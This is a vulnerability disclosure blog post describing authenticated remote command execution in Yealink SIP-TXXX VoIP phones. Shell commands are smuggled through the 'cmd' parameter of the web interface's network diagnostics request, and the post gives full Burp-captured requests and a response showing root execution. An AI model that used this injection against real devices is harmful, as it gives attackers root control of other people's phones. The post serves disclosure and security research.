Do you love hacking Phones? well of course VOIP phones , this should be worth a read! Just unconvered a vulnerability that existed in Yealink SIP-TXXX, This vulnerability leads to RCE , but it's Authenticated meaning you must be logged in to the web interface! --- #### Proof Of Concept After logging in to the web interface which by any chance can be port 80 or port 443 , there is a `Network` tab clicking on it , there are 5 sections `Basic`,`PC Port`,`NAT`,`Advanced`,and `Diagnostics`, Clicking on `Diagnostics`: ![](https://i.imgur.com/kjhoJFx.jpg) and there we can `ping` or perform `traceroute` command upon an IP address , capturing that request with burpsuite will reveal how the whole thing should look and how the parameters are sent with their values; ![](https://i.imgur.com/XxRbgeK.jpg) ```text POST /servlet?m=mod_data&p=network-diagnosis&q=docmd&Rajax=0.890925468511929 HTTP/1.1 Host: xxx.xxx.xxx.xxx Content-Length: 49 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Content-Type: application/x-www-form-urlencoded Accept: */* Origin: http://xxx.xxx.xxx.xxx Referer: http://xxx.xxx.xxx.xxx/servlet?m=mod_data&p=network-diagnosis&q=load Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: JSESSIONID=9a83d24461329a130 Connection: close cmd=start ping 127.0.0.1&token=1714636915c6acea98 ``` so the parameter `cmd` takes the value `start` then the command to execute `ping 127.0.0.1`, so I thought of it as an easy win , where as I changed the value of the parameter `cmd` to take another value to execute instead of `ping` by an easy basic linux command: ```text cmd=; id;&token=1714636915c6acea98 ``` and now it will execute `id` command instead! ![](https://i.imgur.com/1K50Yji.jpg) **POST REQUEST** ```text POST /servlet?m=mod_data&p=network-diagnosis&q=docmd&Rajax=0.6597899560162612 HTTP/1.1 Host: xxx.xxx.xxx.xxx Content-Length: 33 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Content-Type: application/x-www-form-urlencoded Accept: */* Origin: http://xxx.xxx.xxx.xxx Referer: http://xxx.xxx.xxx.xxx/servlet?m=mod_data&p=network-diagnosis&q=load Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: JSESSIONID=9a83d2446809c4f88 Connection: close cmd=; id&token=1957747793cee22738 ``` **RESPONSE** ``` HTTP/1.1 200 OK Content-Type: text/html Connection: close Date: Wed, 10 Nov 2021 14:20:23 GMT Server: embed httpd Content-Length: 82 <html> <body> <div id="_RES_INFO_"> uid=0(root) gid=0(root) </div> </body> </html> ``` And there we have RCE! :100: Contact : Twitter: [tahaafarooq](https://twitter.com/tahaafarooq), Telegram : [tahaafarooq](https://t.me/tahaafarooq)
Last changed by  
Tahaa Farooq
お前はもう死んでいる
2353

Read more

Hackthebox Cyber Apocalypse 2024 CTF

Hello everybody reading this :), This is my writeup for the challenges hosted in Hackthebox Cyber Apocalypse CTF 2024 with the theme "Hacker Royale"

4/16/2024
PicoCTF 2024 Reverse Engineering Challenges Writeup

Below is my solution upon solving the reverse engineering category from picoCTF 2024. There was a total of 7 reverse engineering challenges. I could say they were pretty straight forward and interesting challenges!

3/26/2024
CyberTalents Writeup (Malware Reverse Engineering)

This is my approach to how i solved the challenges from the category Malware Reverse Engineering that is on the platform of CyberTalents

1/31/2024
DLINK DPH-400SE - Exposure of Sensitive Information to an Unauthorized Actor

With default credential for the guest user “guest:guest” to login on the web portal, the guest user can head to maintenance tab under access and modify the users which allows guest user to modify all users as well as view passwords for all users.

10/10/2023
Read more from Tahaa Farooq
Published on HackMD